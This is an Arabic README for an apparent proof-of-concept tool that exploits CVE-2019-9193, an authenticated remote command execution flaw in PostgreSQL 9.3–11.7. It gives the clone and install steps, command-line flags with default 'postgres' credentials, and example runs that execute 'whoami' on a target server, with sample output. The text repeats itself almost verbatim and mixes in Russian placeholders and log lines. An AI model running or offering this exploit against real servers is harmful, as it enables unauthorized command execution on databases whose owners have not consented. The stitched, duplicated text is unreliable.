
هي أداة PoC مصممة لاستغلال ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) موثّقة في إصدارات محددة من PostgreSQL (9.3 - 11.7).
GenPostgresRCEExploit هي أداة PoC مصممة لاستغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) التي تتطلب مصادقة في إصدارات معينة من PostgreSQL (9.3 - 11.7). تتيح للمستخدمين الموثّقين تنفيذ أوامر النظام على خادم قاعدة بيانات PostgreSQL المعرّض للثغرة CVE-2019-9193.
psycopg2)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <target_ip> -p <port> -d <database_name> -U <username> -P <password> -c "<system_command>"
-i, --ip: عنوان IP لخادم PostgreSQL (الافتراضي: 127.0.0.1)-p, --port: منفذ خادم PostgreSQL (الافتراضي: 5432)-d, --database: اسم قاعدة بيانات PostgreSQL (الافتراضي: template1)-U, --user: اسم المستخدم للاتصال بخادم PostgreSQL (الافتراضي: postgres)-P, --password: كلمة المرور للاتصال بخادم PostgreSQL (الافتراضي: postgres)-c, --command: أمر النظام المراد تنفيذه على الخادم-t, --timeout: مهلة الاتصال بالثواني (الافتراضي: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
يتصل هذا المثال بخادم PostgreSQL على العنوان 192.168.1.10، ويجري المصادقة باستخدام بيانات الاعتماد المقدمة، وينفّذ الأمر whoami.
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена
postgres
هذه الأداة مخصصة للأغراض التعليمية والاختبار الأخلاقي فقط. الاستخدام غير المصرح به لهذه الأداة ضد أي أنظمة غير قانوني وممنوع منعًا باتًا. لا يتحمل المؤلفون أي مسؤولية عن أي إساءة استخدام.
GenPostgresRCEExploit — أداة PoC مصممة لاستغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في إصدارات معينة من PostgreSQL (9.3 - 11.7). تتيح للمستخدمين الموثّقين تنفيذ أوامر النظام على خادم PostgreSQL المعرّض للثغرة CVE-2019-9193.
psycopg2)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <IP-адрес> -p <порт> -d <имя_базы_данных> -U <пользователь> -P <пароль> -c "<системная_команда>"
-i, --ip: عنوان IP لخادم PostgreSQL (الافتراضي: 127.0.0.1)-p, --port: منفذ خادم PostgreSQL (الافتراضي: 5432)-d, --database: اسم قاعدة بيانات PostgreSQL (الافتراضي: template1)-U, --user: اسم المستخدم للاتصال بخادم PostgreSQL (الافتراضي: postgres)-P, --password: كلمة المرور للاتصال بخادم PostgreSQL (الافتراضي: postgres)-c, --command: أمر النظام المطلوب تنفيذه على الخادم-t, --timeout: مهلة الاتصال بالثواني (الافتراضي: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
في هذا المثال، تتصل الأداة بخادم PostgreSQL على العنوان 192.168.1.10، وتجري المصادقة باستخدام البيانات المحددة، وتنفّذ الأمر whoami.
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена
postgres
هذه الأداة مخصصة حصريًا للأغراض التعليمية والاختبار القانوني. الاستخدام غير المصرح به لهذه الأداة ضد أي أنظمة غير قانوني وممنوع منعًا باتًا. لا يتحمل المؤلفون أي مسؤولية عن أي استخدام غير مشروع.